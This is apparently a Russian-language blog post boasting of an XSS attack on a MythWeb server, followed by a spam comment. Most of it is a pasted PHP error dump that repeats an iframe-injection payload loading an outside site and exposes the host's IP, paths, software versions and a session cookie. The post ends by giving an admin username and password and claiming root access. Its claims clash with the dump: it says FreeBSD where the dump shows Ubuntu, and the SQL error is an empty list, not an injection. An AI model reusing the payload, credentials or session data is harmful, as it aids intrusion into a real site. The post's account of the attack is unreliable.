Данные выглядят через PHP на взломанном сайте следующим образом! Надо отметить, что сайт лёг из-за банальной XSS-атаки! Сам сайт пропускает 90% всех уязвимостей, в том числе SQL-инъекции! Итак, смотрим отчёт PHP (в нём видно, что запрос упал на пустом списке `program.category_type IN ()`, а сама страница ошибки отдаёт наружу содержимое $_SESSION и $_SERVER):
datetime: 2010-12-29 12:53:53 (CET)
errornum: 256
error type: User Error
error string: SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND
program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
filename: /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
error line: 83
==========================================================================
Backtrace:
file: /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
line: 83
class:
function: trigger_error
type:
args: Array
(
[0] => SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND
program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
[1] => 256
)
file: /usr/share/mythtv/mythweb/classes/Database.php
line: 263
class: Database_Query_mysql
function: execute
type: ->
args: Array
(
[0] => Array ( )
)
file: /usr/share/mythtv/mythweb/modules/tv/includes/programs.php
line: 166
class: Database
function: query
type: ->
args: Array
(
[0] => SELECT program.*,
UNIX_TIMESTAMP(program.starttime) AS starttime_unix,
UNIX_TIMESTAMP(program.endtime) AS endtime_unix,
IFNULL(programrating.system, «») AS rater,
IFNULL(programrating.rating, «») AS rating,
channel.callsign,
channel.channum
FROM program
LEFT JOIN programrating USING (chanid, starttime)
LEFT JOIN channel ON program.chanid = channel.chanid
LEFT JOIN credits ON (program.chanid = credits.chanid AND program.starttime =
credits.starttime)
LEFT JOIN people ON (credits.person = people.person)
WHERE program.chanid IN (1) AND (program.endtime > FROM_UNIXTIME(‘1293623633’) AND program.starttime
< FROM_UNIXTIME(‘1296302033’) AND program.starttime != program.endtime) AND ((program.title LIKE
‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=
1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′
AND program.endtime<=’2011-01-12 12:53:53′)
GROUP BY channel.callsign, program.chanid, program.starttime ORDER BY program.starttime
)
file: /usr/share/mythtv/mythweb/modules/tv/search.php
line: 338
class:
function: load_all_program_data
type:
args: Array
(
[0] => 1293623633
[1] => 1296302033
[2] =>
[3] =>
[4] => ((program.title LIKE
‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=
1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′
AND program.endtime<=’2011-01-12 12:53:53′)
)
file: /usr/share/mythtv/mythweb/modules/tv/handler.php
line: 87
class:
function: require_once
type:
args: Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/search.php
)
file: /usr/share/mythtv/mythweb/mythweb.php
line: 35
class:
function: require_once
type:
args: Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/handler.php
)
==========================================================================
$_GET: Array
(
[type] => a
[af] => Array
(
[0] => Array
(
[0] => title
)
)
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
)
[starttime] => now
[endtime] => + 2 weeks
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[categories] => Array
(
[0] => All
)
[search] => Search
)
==========================================================================
$_SESSION: Array
(
[language] => English
[prefer_channum] => 1
[date_statusbar] => %a %b %e, %Y, %I:%M %p
[date_scheduled] => %a %b %e, %Y (%I:%M %p)
[date_scheduled_popup] => %a %b %e, %Y
[date_recorded] => %a %b %e, %Y (%I:%M %p)
[date_search] => %a %b %e, %Y, %I:%M %p
[date_listing_key] => %a %b %e, %Y, %I:%M %p
[date_listing_jump] => %a %b %e, %Y
[date_channel_jump] => %a %b %e, %Y
[date_job_status] => %a %b %e, %Y, %I:%M %p
[time_format] => %I:%M %p
[recorded_pixmaps] => 1
[guide_favonly] =>
[timeslot_size] => 300
[num_time_slots] => 36
[timeslot_blocks] => 3
[timeslotbar_skip] => 20
[max_stars] => 4
[star_character] => ★
[show_popup_info] => 1
[show_channel_icons] => 1
[sortby_channum] => 1
[recorded_paging] =>
[genre_colors] => 1
[show_video_covers] => 1
[settings] => Array
(
[screens] => Array
(
[tv] => Array
(
[upcoming recordings] => Array
(
[title] => on
[channel] => on
[record date] => on
[length] => on
)
)
)
)
[backend] => Array
(
[127.0.0.1] => Array
(
[proto_version] => Array
(
[last_check_version] => 23056
[last_check_time] => 1293623425
)
)
[timezone] => Array
(
[value] => Europe/Amsterdam
[last_check_time] => 1293623425
)
)
[tv] => Array
(
[last] => Array
(
[0] => search
)
)
[recorded_title] =>
[recorded_recgroup] =>
[recorded_sortby] => Array
(
[0] => Array
(
[field] => airdate
[reverse] => 1
)
[1] => Array
(
[field] => title
[reverse] =>
)
)
[] => Array ( )
[scheduled_recordings] => Array
(
[disp_scheduled] => 1
[disp_duplicates] => 1
[disp_deactivated] => 1
[disp_conflicts] => 1
[disp_recgroup] =>
[disp_title] =>
)
[video_sortby] => Array
(
[0] => Array
(
[field] => title
[reverse] =>
)
)
=> Array
(
[path] => /<div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[browse] => -1
[VideoAdminPassword] => 1
)
[search] => Array
(
[type] => a
[s] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[ctype] => Array ( )
[categories] => Array
(
[0] => All
)
[stars_gt] => 0
[stars_lt] => 0
[starttime] => now
[endtime] => + 2 weeks
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
)
[af] => Array
(
[0] => Array
(
[0] => title
)
)
[aj] => Array
(
[0] => AND
)
[hd] =>
[commfree] =>
[unwatched] =>
[scheduled] =>
[generic] =>
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0
scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0
scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
)
)
==========================================================================
$_SERVER: Array
(
[REDIRECT_STATUS] => 200
[HTTP_HOST] => 211.78.181.247
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
(.NET CLR 3.5.30729)
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip,deflate
[HTTP_ACCEPT_CHARSET] => windows-1251,utf-8;q=0.7,*;q=0.7
[HTTP_KEEP_ALIVE] => 115
[HTTP_CONNECTION] => keep-alive
[HTTP_REFERER] =>
https://211.78.181.247/mythweb/tv/search?type=q&s=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%
3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fifram
e%3E%3C%2Fdiv%3E&search=Search
[HTTP_COOKIE] => mythweb_tmpl=default; mythweb_skin=default; mythweb_id=gir24tta61fkc6rto1tk8b4m95
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.16 (Ubuntu) Server at 211.78.181.247 Port 80</address>
[SERVER_SOFTWARE] => Apache/2.2.16 (Ubuntu)
[SERVER_NAME] => 211.78.181.247
[SERVER_ADDR] => 192.168.123.11
[SERVER_PORT] => 80
[REMOTE_ADDR] => 195.110.239.64
[DOCUMENT_ROOT] => /var/www
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www/mythweb/mythweb.php
[REMOTE_PORT] => 1452
[REDIRECT_QUERY_STRING] =>
type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E
%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2
Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0
%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%
2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci
frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv
%3E&categories%5B%5D=All&search=Search
[REDIRECT_URL] => /mythweb/tv/search
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E
%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2
Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0
%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%
2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci
frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv
%3E&categories%5B%5D=All&search=Search
[REQUEST_URI] =>
/mythweb/tv/search?type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%
3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%
3C%2Fiframe%3E%3C%2Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3A
absolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+h
eight%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%
3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2
Fiframe%3E%3C%2Fdiv%3E&categories%5B%5D=All&search=Search
[SCRIPT_NAME] => /mythweb/mythweb.php
[PATH_INFO] => /tv/search
[PATH_TRANSLATED] => /var/www/tv/search
[PHP_SELF] => /mythweb/mythweb.php/tv/search
[REQUEST_TIME] => 1293623632
[STATUS] => 200
[URL] => /mythweb/tv/search
[HTTP_PORT] => 80
)
==========================================================================
$constant_list[«user»]: Array
(
[ERROR] => 512
[E_ASSERT_ERROR] => 4096
[FATAL] => 256
[PHP_MIN_VERSION] => 5.1
[WARNING] => 1024
[WebDBSchemaVer] => 2
[dupsin_all] => 15
[dupsin_ex_generic] => 64
[dupsin_ex_repeats] => 32
[dupsin_newepisodes] => 16
[dupsin_oldrecorded] => 2
[dupsin_recorded] => 1
[error_email] =>
[gb] => 1073741824
[hostname] => display-desktop
[http_host] => 211.78.181.247
[kb] => 1024
[max_stars] => 4
[mb] => 1048576
[module] => tv
[modules_path] => ./modules
[num_time_slots] => 36
[prefer_channum] => 1
[rectype_always] => 4
[rectype_channel] => 3
[rectype_daily] => 2
[rectype_dontrec] => 8
[rectype_finddaily] => 9
[rectype_findone] => 6
[rectype_findweekly] => 10
[rectype_once] => 1
[rectype_override] => 7
[rectype_weekly] => 5
[root] => /mythweb/
[root_url] => https://211.78.181.247/mythweb/
[searchtype_keyword] => 3
[searchtype_manual] => 5
[searchtype_people] => 4
[searchtype_power] => 1
[searchtype_title] => 2
[skin] => default
[skin_img_url] => https://211.78.181.247/mythweb/skins/default/img/
[skin_url] => https://211.78.181.247/mythweb/skins/default/
[star_character] => ★
[stream_url] => https://211.78.181.247:80//mythweb/
[tb] => 1099511627776
[timeslot_blocks] => 3
[timeslot_size] => 300
[timeslotbar_skip] => 20
[tmpl] => default
[tmpl_dir] => modules/tv/tmpl/default/
)
Отсюда, удалось взломать Базу Данных сайта и получить пароль администратора: l:admin p:creator2000 Теперь, говорят, взломанный сервер находится под контролем хакеров 😉 Ещё, благодаря эксплоиту удалось получить на сервере FreeBSD права root!
Добрый день! Хочу от всей души поблагодарить админа этого замечательного сайта за интересные и содержательные посты! Отлично провела время за их чтением. Буду чаще к вам наведоваться и советовать ваш сайт друзьям! Приглашаю вас в гости на мой портал!!! Здесь вы отлично поведёте время читая статьи о здоровье http://dixi.helpset.ru
Да вам спасибо! Всех благ!